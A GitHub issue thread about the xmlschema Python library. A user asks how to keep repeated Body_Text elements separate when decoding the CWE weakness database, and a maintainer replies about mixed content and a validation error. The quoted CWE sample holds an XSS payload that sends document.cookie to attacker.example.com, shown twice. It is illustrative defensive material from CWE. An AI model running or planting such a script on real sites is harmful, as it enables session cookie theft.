Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Separating Content of Multiple Elements with the Same Name #334

Closed
TrustArgon opened this issue Jan 4, 2023 · 3 comments
Closed

Separating Content of Multiple Elements with the Same Name #334

TrustArgon opened this issue Jan 4, 2023 · 3 comments

Comments

@TrustArgon
Copy link

TrustArgon commented Jan 4, 2023

When processing an XML document, xmlschema concatenates the contents of multiple elements with the same name into a single value of a dictionary with the key of the elements name. Is there a way to force unique key values when multiple elements of the same name are present so the result is a list of dictionaries or a dictionary containing unique key:value pairs for each instance?

The example I'm working with is the xml of the CWE Database found at: CWE Database XML ZIP File

The schema can be found at: CWE Database XSD File

Below is the section of the XSD im working with, the element in question is named 'Body_Text':

<xs:complexType name="DemonstrativeExamplesType">
		<xs:annotation>
			<xs:documentation>The DemonstrativeExamplesType complex type contains one or more Demonstrative_Example elements, each of which contains an example illustrating how a weakness may look in actual code. The optional Title_Text element provides a title for the example. The Intro_Text element describes the context and setting in which this code should be viewed, summarizing what the code is attempting to do. The Body_Text and Example_Code elements are a mixture of code and explanatory text about the example. The References element provides additional information.</xs:documentation>
			<xs:documentation>The optional Demonstrative_Example_ID attribute is used by the internal CWE team to uniquely identify examples that are repeated across any number of individual weaknesses. To help make sure that the details of these common examples stay synchronized, the Demonstrative_Example_ID is used to quickly identify those examples across CWE that should be identical. The identifier is a string and should match the following format: DX-1.</xs:documentation>
		</xs:annotation>
		<xs:sequence>
			<xs:element name="Demonstrative_Example" minOccurs="1" maxOccurs="unbounded">
				<xs:complexType>
					<xs:sequence>
						<xs:element name="Title_Text" type="xs:string" minOccurs="0" maxOccurs="1"/>
						<xs:element name="Intro_Text" type="cwe:StructuredTextType" minOccurs="1" maxOccurs="1"/>
						<xs:choice minOccurs="0" maxOccurs="unbounded">
							<xs:element name="Body_Text" type="cwe:StructuredTextType"/>
							<xs:element name="Example_Code" type="cwe:StructuredCodeType"/>
						</xs:choice>
						<xs:element name="References" type="cwe:ReferencesType" minOccurs="0" maxOccurs="1"/>
					</xs:sequence>
					<xs:attribute name="Demonstrative_Example_ID" type="xs:string"/>
				</xs:complexType>
			</xs:element>
		</xs:sequence>
	</xs:complexType>

A sample of the xml code that results in my question is as follows:

<Demonstrative_Examples>
            <Demonstrative_Example>
               <Intro_Text>In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.</Intro_Text>
               <Body_Text>The snippet of code below establishes a new cookie to hold the sessionID.</Body_Text>
               <Example_Code Nature="Bad" Language="Java">
                  <xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>response.addCookie(c);</xhtml:div>
               </Example_Code>
               <Body_Text>The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:</Body_Text>
               <Example_Code Nature="Attack" Language="JavaScript">
                  <xhtml:div>document.write('&lt;img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '"&gt;'</xhtml:div>
               </Example_Code>
               <Body_Text>When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.</Body_Text>
               <Body_Text>To mitigate the risk, use the setHttpOnly(true) method.</Body_Text>
               <Example_Code Nature="Good" Language="Java">
                  <xhtml:div>String sessionID = generateSessionId();<xhtml:br/>Cookie c = new Cookie("session_id", sessionID);<xhtml:br/>c.setHttpOnly(true);<xhtml:br/>response.addCookie(c);</xhtml:div>
               </Example_Code>
            </Demonstrative_Example>
         </Demonstrative_Examples>

The following shows the part of the object relevant to the question that is generated:

 'Demonstrative_Examples': {'Demonstrative_Example': [{'Body_Text': ['The '
                                                                     'snippet '
                                                                     'of code '
                                                                     'below '
                                                                     'establishes '
                                                                     'a new '
                                                                     'cookie '
                                                                     'to hold '
                                                                     'the '
                                                                     'sessionID.',
                                                                     'The '
                                                                     'HttpOnly '
                                                                     'flag is '
                                                                     'not set '
                                                                     'for the '
                                                                     'cookie. '
                                                                     'An '
                                                                     'attacker '
                                                                     'who can '
                                                                     'perform '
                                                                     'XSS '
                                                                     'could '
                                                                     'insert '
                                                                     'malicious '
                                                                     'script '
                                                                     'such as:',
                                                                     'When the '
                                                                     'client '
                                                                     'loads '
                                                                     'and '
                                                                     'executes '
                                                                     'this '
                                                                     'script, '
                                                                     'it makes '
                                                                     'a '
                                                                     'request '
                                                                     'to the '
                                                                     'attacker-controlled '
                                                                     'web '
                                                                     'site. '
                                                                     'The '
                                                                     'attacker '
                                                                     'can then '
                                                                     'log the '
                                                                     'request '
                                                                     'and '
                                                                     'steal '
                                                                     'the '
                                                                     'cookie.',
                                                                     'To '
                                                                     'mitigate '
                                                                     'the '
                                                                     'risk, '
                                                                     'use the '
                                                                     'setHttpOnly(true) '
                                                                     'method.'],
                                                       'Example_Code': [{'$': 'String '
                                                                              'sessionID '
                                                                              '= '
                                                                              'generateSessionId();Cookie '
                                                                              'c '
                                                                              '= '
                                                                              'new '
                                                                              'Cookie("session_id", '
                                                                              'sessionID);response.addCookie(c);',
                                                                         '@Language': 'Java',
                                                                         '@Nature': 'Bad'},
                                                                        {'$': "document.write('<img "
                                                                              'src="http://attacker.example.com/collect-cookies?cookie=\' '
                                                                              '+ '
                                                                              'document.cookie '
                                                                              '. '
                                                                              '\'">\'',
                                                                         '@Language': 'JavaScript',
                                                                         '@Nature': 'Attack'},
                                                                        {'$': 'String '
                                                                              'sessionID '
                                                                              '= '
                                                                              'generateSessionId();Cookie '
                                                                              'c '
                                                                              '= '
                                                                              'new '
                                                                              'Cookie("session_id", '
                                                                              'sessionID);c.setHttpOnly(true);response.addCookie(c);',
                                                                         '@Language': 'Java',
                                                                         '@Nature': 'Good'}],
                                                       'Intro_Text': 'In this '
                                                                     'example, '
                                                                     'a cookie '
                                                                     'is used '
                                                                     'to store '
                                                                     'a '
                                                                     'session '
                                                                     'ID for a '
                                                                     "client's "
                                                                     'interaction '
                                                                     'with a '
                                                                     'website. '
                                                                     'The '
                                                                     'intention '
                                                                     'is that '
                                                                     'the '
                                                                     'cookie '
                                                                     'will be '
                                                                     'sent to '
                                                                     'the '
                                                                     'website '
                                                                     'with '
                                                                     'each '
                                                                     'request '
                                                                     'made by '
                                                                     'the '
                                                                     'client.'}]},

Any help would be greatly appreciated.

@brunato
Copy link
Member

brunato commented Feb 6, 2023

Hi,
sorry for a late response but i was involved on closing other things.

Analyzed the schema the related data is bound with a complex mixed content, and this is the reason of (maybe unwanted) string concatenation. Before that I've also to resolve a validation issue of cwec_v4.10.xml data:

>>> import xmlschema
>>> xs = xmlschema.XMLSchema11('cwe_schema_latest.xsd')
>>> xs.validate('cwec_v4.10.xml')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/brunato/Development/projects/xmlschema/xmlschema/validators/schemas.py", line 1703, in validate
    raise error
xmlschema.validators.exceptions.XMLSchemaValidationError: failed validating <Element '{http://cwe.mitre.org/cwe-6}Note' at 0x7fa90c4bcb80> with Xsd11Group(model='sequence', occurs=[1, 1]):

Reason: character data between child elements not allowed

Schema:

  <xs:complexType xmlns:xs="http://www.w3.org/2001/XMLSchema">
      <xs:complexContent>
          <xs:extension base="cwe:StructuredTextType">
              <xs:attribute name="Type" type="cwe:NoteTypeEnumeration" use="required" />
          </xs:extension>
      </xs:complexContent>
  </xs:complexType>

Instance:

  <Note xmlns="http://cwe.mitre.org/cwe-6" Type="Relationship">This could introduce other weaknesses related to missing input validation.</Note>

Path: /Weakness_Catalog/Weaknesses/Weakness[9]/Notes/Note[1]

I hope to produce a fix for next release.

Thank you

@brunato
Copy link
Member

brunato commented Feb 9, 2023

Hi @TrustArgon,

found the problem with validation issue of cwec_v4.10.xml data, but independently from the fix i tried to decode after building a full sample schema and instance (issue_334.zip) and the decoding now seems correct (i used xmlschema==2.2.0 and elementpath==4.0.1)

xs = self.schema_class(xsd_file)
result = xs.decode(xml_file)
body_text = result['Demonstrative_Example'][0]['Body_Text']
print(body_text)
# ['The snippet of code below establishes a new cookie to hold the sessionID.', 'The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:', 'When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.', 'To mitigate the risk, use the setHttpOnly(true) method.']

Could you try my test files with the same environment?

Thank you

@brunato
Copy link
Member

brunato commented Mar 5, 2023

I assume this issue is resolved, otherwise re-open.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants